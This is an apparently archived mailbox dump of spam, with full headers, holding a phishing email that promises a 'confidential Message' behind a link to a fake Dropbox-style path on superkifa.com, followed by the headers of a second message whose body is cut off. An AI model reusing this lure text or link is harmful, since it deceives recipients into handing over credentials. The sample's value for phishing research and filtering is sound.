From: Joe Aloisa <aloisa@aol.com>
Message-Id: <15a382ac75a-57e9-56dc@webprd-m83.mail.aol.com>
Subject: Review your Document
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_24827_673334085.1487001012055"
X-MB-Message-Source: WebUI
X-MB-Message-Type: User
X-Mailer: JAS STD
X-Originating-IP: [207.244.86.197]
x-aol-global-disposition: S
X-SPAM-FLAG: YES
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=mx.aol.com;
	s=20150623; t=1487001016;
	bh=RZcFpSrrMWDqFktFt5/D1MpCtR/L2x3ehWhAPmAmNgc=;
	h=From:Subject:Message-Id:Date:MIME-Version:Content-Type;
	b=L4z5GOPCP5MzGHTlNmn2fFlnRAp3mZDnKuxwE/r38xwnPyoU6Ae7ZywIfGeyL8Cpp
	 Npb7vdTO7rIiG4vWt+uZJOBszDVesi2u9fWxjYPAysFD1wbnYBMY6rh9IwMo/JGTXG
	 T5PdRpnenUq9lDk1riNUK5KLqYTGjRFAn4WrUu9Q=
X-AOL-REROUTE: YES
x-aol-sid: 3039ac1afc1058a1d5b41044
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 69

------=_Part_24827_673334085.1487001012055
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit


i've sent you a confidential Message


View Your Message Here


Joseph Aloisa

------=_Part_24827_673334085.1487001012055
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit

<font color='black' size='2' face='Arial, Helvetica, sans-serif'>
<div><font face="Arial, Helvetica, sans-serif">i've sent you a confidential Message</font></div>

<div><font face="Arial, Helvetica, sans-serif"><br>
</font></div>

<div><font face="Arial, Helvetica, sans-serif">View Your Message <a href="http://superkifa.com:/Folly/dropbox2016/Home/">Here</a></font></div>
<br>

<div style="color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10pt; clear: both;">Joseph Aloisa</div>
</font>
------=_Part_24827_673334085.1487001012055--

From jose@monkey.org Wed Feb 15 04:48:39 2017 +0000
Return-Path: besd.helpdesk@besd.net
Delivered-To: jose@monkey.org
X-FDA: 72517594758.01.crack31_11600401df730
X-Spam-Summary: 50,3,0,f4407d2a49afed73,d41d8cd98f00b204,besd.helpdesk@besd.net,:,RULES_HIT:41:72:152:355:375:379:509:962:967:968:973:983:988:989:1021:1185:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1514:1515:1516:1517:1535:1544:1588:1589:1592:1593:1594:1676:1710:1711:1730:1747:1777:1792:2198:2199:2393:2525:2527:2543:2553:2559:2567:2682:2685:2693:2859:2933:2937:2939:2942:2945:2947:2951:2954:2982:3022:3138:3139:3140:3141:3142:3148:3352:3590:3865:3867:3868:3870:3873:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4118:4250:4321:4552:4605:5007:6117:6119:6248:6261:6669:6688:7809:7903:8550:8599:8603:8825:9025:9060:9130:9388:9416:9908:10004:10234:10346:11658:11914:12043:12050:12295:12438:12530:12555:12661:12812:12955:12958:12959:12967:12968:13095:13139:13161:13229:14096:14149:14181:14721:14827:14885:21080:21212:21433:21451:30022:30054:30079:30090,0,RBL:205.121.132.143:@besd.net:.lbl8.mailshell.net-62.2.0.100 64.100.201.201,CacheIP:none,Bayesian:0.5,0.
X-HE-Tag: crack31_11600401df730
X-Filterd-Recvd-Size: 7213
Received: from afury.besd.net (afury.besd.net [205.121.132.143])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 15 Feb 2017 04:48:39 +0000 (UTC)
Received: from ateela.besd.net ([205.121.132.128])
  by afury.besd.net with ESMTP; 14 Feb 2017 21:48:38 -0700
Received: from apotts.besd.net (205.121.132.140) by relay.besd.net
 (205.121.132.128) with Microsoft SMTP Server id 14.3.319.2; Tue, 14 Feb 2017
 06:53:34 -0700
Received: from localhost by apotts.besd.net;  14 Feb 2017 06:53:33 -0700
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Message-ID: <8de621$b510266=575486de1a6c4709@apotts.besd.net>
